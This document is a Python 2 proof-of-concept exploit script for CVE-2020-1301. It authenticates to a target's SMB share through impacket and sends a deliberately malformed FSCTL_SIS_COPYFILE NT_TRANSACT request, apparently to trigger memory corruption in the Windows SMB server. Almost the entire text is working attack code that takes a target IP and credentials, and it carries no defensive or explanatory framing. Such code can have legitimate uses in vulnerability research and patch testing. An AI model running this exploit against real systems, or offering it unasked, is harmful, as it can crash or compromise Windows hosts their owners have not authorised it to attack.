exploit.py

#!/usr/bin/python

from scapy.all import *
from impacket import smb

import sys, getopt

def main(argv):
    try:
        opts, args = getopt.getopt(argv,"ht:u:p:",["target=", "username=", "password="])
    except getopt.GetoptError:
        print './CVE-2020-1301.py -t <target>'
        sys.exit(2)

    target_ip = "127.0.0.1"
    username = ""
    password = ""

    for opt, arg in opts:
        if opt == '-h':
            print './CVE-2020-1301.py -t <target> -u <username> -p <password>'
            sys.exit()
        elif opt in ("-t", "--target"):
            target_ip = arg
        elif opt in ("-u", "--user"):
            username = arg
        elif opt in ("-p", "--password"):
            password = arg

    '''
    IOCTL Code: 0x090100 is FSCTL_SIS_COPYFILE
    '''
    s = smb.SMB('*SMBSERVER', target_ip)
    s.login(username, password, '')
    tid = s.tree_connect_andx(r"\\*SMBSERVER\C")
    print "tid = %d" % tid

    fName = 'Windows\\system.ini'
    fid = s.open_andx(tid, fName, smb.SMB_O_OPEN, smb.SMB_ACCESS_READ)[0] 
    print "fid = %d" % fid

    try:       
        s2 = smb.NewSMBPacket()

        cmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
        cmd['Parameters'] = smb.SMBNTTransaction_Parameters()
        cmd['Data']       = smb.SMBNTTransaction_Data()

        IoctlCode = 0x90100
        setup =  smb.pack('<L', IoctlCode)
        setup += smb.pack('<H', fid)
        setup += 'a' * 2
        name = ''
        param = ''  

        size = 10
        data =  smb.pack('<L', size)        # SourceFileNameLength
        data += smb.pack('<L', 1)           # DestinationFileNameLength
        data += smb.pack('<L', 0x00000002)  # Flags
        data += '\x00' * (size-1)           # SourceFileName (variable)
        data += '\x00'                      # DestinationFileName (variable)
        data += '\x00\x00'
        data += '\x41' * 16
        data += '\x42' * 16
        data += '\x43' * 16
        data += '\x44' * 16
        data += 'Exploit me! ;-)'

        cmd['Parameters']['MaxSetupCount']      = 0x55
        cmd['Parameters']['TotalParameterCount']= len(param)
        cmd['Parameters']['TotalDataCount']     = len(data)
        cmd['Parameters']['MaxParameterCount']  = 0x55
        cmd['Parameters']['MaxDataCount']       = 0x55
        cmd['Parameters']['ParameterCount']     = len(param)
        cmd['Parameters']['ParameterOffset']    = 0x20+0x03+0x1c+len(setup)+len(name) 
        cmd['Parameters']['DataCount']          = len(data)
        cmd['Parameters']['DataOffset']         = 0x20+0x03+0x26+len(setup)+len(name)+len(param)
        cmd['Parameters']['Function']           = 0x0002
        cmd['Parameters']['Setup']              = setup

        cmd['Data']['Pad1'] = ''
        cmd['Data']['NT_Trans_Parameters'] = param
        cmd['Data']['Pad2'] = ''
        cmd['Data']['NT_Trans_Data'] = data

        s2.addCommand(cmd)
        s2['Tid'] = tid
        smb.SMB.sendSMB(s,s2)
    except smb.SessionError, e:
        print e

if __name__ == "__main__":
   main(sys.argv[1:])